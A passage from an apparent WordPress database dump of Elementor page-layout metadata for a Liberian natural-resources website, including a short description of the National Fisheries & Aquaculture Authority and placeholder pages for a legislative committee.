soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9db38fc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"571a245f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a94bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1d96f140\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"national-legislature\\\",\\\"tag_id\\\":\\\"66\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"national-legislature\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"572e4794\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"65306131\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30437ac5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1bd7b4a2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:national-legislature\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27540,3997,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27541,3998,'_elementor_edit_mode','builder'),(27542,3998,'_elementor_template_type','wp-post'),(27543,3998,'_elementor_version','2.7.5'),(27544,3998,'_wp_page_template','default'),(27545,3998,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"aafb093\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The National Fisheries &amp; Aquaculture Authority was created by an Act of National Legislation on October 9, 2017. It functions as a fully-fledged autonomous body pursuant to the Public Authorities Law of the Republic of Liberia. NaFAA has its roots in the erstwhile Bureau of National Fisheries, which operated as a unit within the department of Technical services of the Ministry of Agriculture from 1956 to 2017.<\\/p>\\n<p>The overall fisheries sector goal is: Sustainably managed and economically viable fisheries that generate prosperity for the present and generations yet unborn.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"db49c3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"793fd76\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e046628\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48352ba\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"nafaa\\\",\\\"tag_id\\\":\\\"65\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"nafaa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2e54ec5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d6bc921\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"70ac5b1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0e5b35e\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:nafaa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27546,3998,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27547,3998,'_thumbnail_id','3221'),(27548,3999,'_elementor_edit_mode','builder'),(27549,3999,'_elementor_template_type','wp-post'),(27550,3999,'_elementor_version','2.7.5'),(27551,3999,'_wp_page_template','default'),(27552,3999,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a1cd518\",\"elType\":\"widget\",\"settings\":{\"editor\":\"National Legislature on Natural Resources Committee coming soon!\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9db38fc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"571a245f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a94bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1d96f140\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"national-legislature\\\",\\\"tag_id\\\":\\\"66\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"national-legislature\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"572e4794\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"65306131\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"30437ac5\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1bd7b4a2\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:national-legislature\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(27553,3999,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(27554,1590,'internet',''),(27555,4000,'_wp_attached_file','2019/11/nafaa-one.png'),(27556,4000,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:21:\"2019/11/nafaa-one.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"nafaa-one-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:20:\"nafaa-one-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27557,4001,'_elementor_edit_mode','builder'),(27558,4001,'_elementor_template_type','wp-post'),(27559,4001,'_elementor_version','2.7.5'),(27560,4001,'_wp_page_template','default'),(27561,4001,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\"